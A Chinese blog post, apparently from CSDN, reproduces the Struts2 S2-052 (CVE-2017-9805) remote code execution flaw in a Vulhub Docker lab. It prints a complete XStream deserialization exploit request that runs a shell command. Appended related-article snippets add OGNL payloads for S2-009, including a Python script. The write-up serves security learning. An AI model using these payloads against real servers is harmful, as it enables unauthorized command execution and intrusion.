复现S2-052远程代码执行漏洞

最新推荐文章于 2024-07-12 15:00:08 发布
最新推荐文章于 2024-07-12 15:00:08 发布
阅读量251 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 安全 web安全 struts struts2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52458793/article/details/130097907
该文章描述了如何使用Vulhub进入漏洞环境,通过构造特定的POST请求触发XML注入漏洞,在Docker容器内创建文件/tmp/success。通过BP工具抓包和分析,然后执行命令进入网站根目录并验证文件存在,完成了漏洞的复现过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

使用vulhub进入漏洞环境目录,并启动

登陆页面

开启bp抓包

复制以下内容到请求模块   构造poc

POST /orders.xhtml HTTP/1.1
Host: 192.168.8.150:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/xml
Content-Length: 2415

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>touch</string>
                        <string>/tmp/success</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>

发送数据包

以上数据包成功执行的话,会在 docker 容器内创建文件/tmp/success

执行docker exec -it e4a20538e4ac /bin/bash即可进入到网站根目录。

执行ls /tmp 查看文件内容。

 

至此漏洞复现完成。

 

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1855
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
复现S2-045远程代码执行漏洞
weixin_67813445的博客
03-28 278
Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。
漏洞复现】S2-052 (CVE-2017-9805)
weixin_30526593的博客
11-20 313
一、漏洞描述 Struts2 的REST插件,如果带有XStream组件,那么在进行反序列化XML请求时,存在未对数据内容进行有效验证的安全隐患,可能发生远程命令执行。 二、受影响版本 Struts2.5 – Struts2.5.12版本 Struts2.3.33版本 三、漏洞POC POST /struts2-rest-sho...
S2-052 漏洞复现
weixin_41082546的博客
10-06 1194
Structs2框架已知的漏洞编号如下: S2-005 S2-009 S2-016 (含S2-013) S2-019 S2-020 S2-021 S2-032 S2-037(含S2-033) DevMode S2-045 S2-046 S2-048 S2-052 S2-055 S2-057 S2-052(CVE-2017-9805)环境: https://gi...
Struts S2-052 漏洞复现
时光凉春衫薄的博客
07-23 1709
最近研究了一下docker 发现这个东西真的是快 漏洞环境许多地方都有现成的省的自己去搭建环境了。可以说真的是便利啊。 这两天又在研究struts2 下了环境做个试验玩玩 通过 docker pull medicean/vulapps:s_struts2_s2-052 下载这个漏洞的环境 查看本地的镜像 将这个镜像运行起来 我将docker的业务端口映射到本机的80端口上 ...
S2-048 远程代码执行漏洞(CVE-2017-9791)
Biu_Biu_Bi的博客
07-12 947
S2-048 远程代码执行漏洞(CVE-2017-9791)
docker复现s2-052远程代码执行漏洞
网安小白的博客
03-29 333
使用docker搭建s2-052远程代码执行漏洞(详细~)
Struts2-052 漏洞复现
Jietewang的博客
10-15 908
前言 struts2应用已是千疮百孔,最近突发奇想想研究一下相关原理和利用情况。s2-052漏洞由lgtm.com的安全研究员汇报,编号为CVE-2017-9805,是一个远程命令执行漏洞漏洞危害程度为高危(Critical)。当用户使用带有 XStream 程序的 Struts REST 插件来处理 XML payloads 时,可能会遭到远程代码执行攻击。 影响版本:Struts 2.5.12 版本,百度说还影响到 2.3.33 版本。 1.环境搭建 本次复现采用ubuntu系统,利用...
S2-052 远程代码执行漏洞
EC_Carrot的博客
08-12 608
漏洞简介 影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-052/README.zh-cn.md 漏洞复现 访问http://your-ip:8080/orders.xhtml即可看到showcase页面,由于rest-plugin会根据URI扩展名或Content-Type来判断解析方法,所以我们只需要修改o
S2-052复现过程(附POC利用)
dfdhxb995397的博客
09-06 546
漏洞编号:CVE-2017-9805(S2-052) 影响版本:Struts 2.5 - Struts 2.5.12 漏洞概述:问题出现在struts2-rest-plugin插件XStreamHandler处理器中的toObject()方法,其中未对传入的值进行任何限制,在使用XStream反 0×01 搭建环境 直接部署struts-2.5.12-all中的struts...
复现S2远程代码执行漏洞
m0_71326960的博客
04-02 663
2.进入s2-052,执行docker-compose up -d命令(此处注意端口被占用会出现下载镜像报错,只需要把正在运行的镜像停止进程)6.说明利用成功,会在docker容器内创建文件/tmp/success,执行docker exec -it 容器id bash。点击send发送数据,出现状态码为200,和vulhub出计算结果后,即漏洞复现成功。3.随便上传一个文件,使用burpsuite进行抓包。1.使用docker搭建漏洞环境,进入目标文件夹。1.使用docker搭建漏洞环境。
Struts2的几个漏洞复现
Z_rr2004的博客
07-08 934
将Content-Type: application/x-www-form-urlencoded改为Content-Type: application/xml。可通过注入OGNL语言进行命令执行。启用Struts REST插件并使用XStream组件对XML进行反序列操作时,未对数据进行有效验证,可进行远程代码执行攻击。(2) docker-compose up -d 启动。
Struts2框架漏洞总结与复现(下)
剁椒鱼头没剁椒的博客
02-08 3097
Apache Struts 1插件的Apache Struts 2.3.x 版本中存在远程代码执行漏洞,该漏洞出现于Struts2的某个类中,该类是为了将Struts1中的Action包装成为Struts2中的Action,以保证Struts2中的Struts1插件启用的情况下,远程攻击者可通过使用恶意字段值,构造特定的输入,发送到ActionMessage类中,从而导致任意命令执行,进而获取目标主机系统权限。在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。
struts2-052-CVE-2017-9805
weixin_43718688的博客
03-15 291
访问 http://ip:8080/ 即可,能看到如下面这个图,就说明可以了。 点edit,然后点submit抓包 在数据包里构造POC: <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unm
java struts2 漏洞复现合集
whatday的专栏
08-31 8038
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
struts2漏洞复现s2-009
最新发布
04-01
### Struts2 S2-009 漏洞复现方法 Struts2 的 S2-009 漏洞主要源于其对 OGNL 表达式的处理不当,允许攻击者通过特定的输入执行任意代码。以下是关于该漏洞的具体分析以及如何进行复现的方法。 #### 背景介绍 Struts2 对于之前版本中的某些安全问题进行了修复,例如针对 S2-003 和 S2-005 的修补措施分别涉及禁用 `#` 号和反斜杠 `\` 符号[^1]。然而,在这些修复之后,新的绕过方式被发现并最终导致了 S2-009 漏洞的发生。 #### 影响范围 此漏洞影响以下版本: - **Struts 2.0.0 到 Struts 2.3.14.2** #### 漏洞原理 S2-009 是由于开发者未能完全阻止恶意用户构造特殊的 URL 参数来触发 OGNL 表达式解析器的行为所致。具体来说,即使框架已经尝试过滤掉一些敏感字符(如 `#`),但仍然可以通过其他手段实现类似的逻辑操作,从而达到远程命令执行的目的。 #### 复现步骤描述 为了成功重现这一漏洞,可以按照如下方式进行设置: 1. 准备目标应用程序环境,确保运行的是受影响范围内未打补丁的 Struts 版本; 2. 构造含有恶意 payload 的 HTTP 请求发送给服务器端口监听地址; - Payload 示例形式可能类似于下面这样 (需替换实际 IP 地址) : ```bash http://<target-ip>:8080/example.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22cmd.exe%22,%22/c%22,%22dir%22})).start()} ``` 上述例子展示了如何利用 `${}` 结构嵌入一段 Java 代码片段到请求参数当中去调用系统 shell 命令。 注意:以上仅为理论说明用途,请勿非法测试他人网站! #### 防护建议 为了避免此类安全隐患再次发生,官方推荐采取以下防护策略之一或者组合使用它们: - 升级至最新稳定版 Struts 库文件; - 自定义配置白名单验证机制限制外部可控变量的内容类型; - 开启开发模式下的调试日志记录功能以便及时发现问题所在位置。 ```python import requests url = 'http://localhost:8080/example.action' payload = {'redirect': '${@java.lang.Runtime@getRuntime().exec("id")}'} response = requests.get(url, params=payload) print(response.text) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

程2067

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值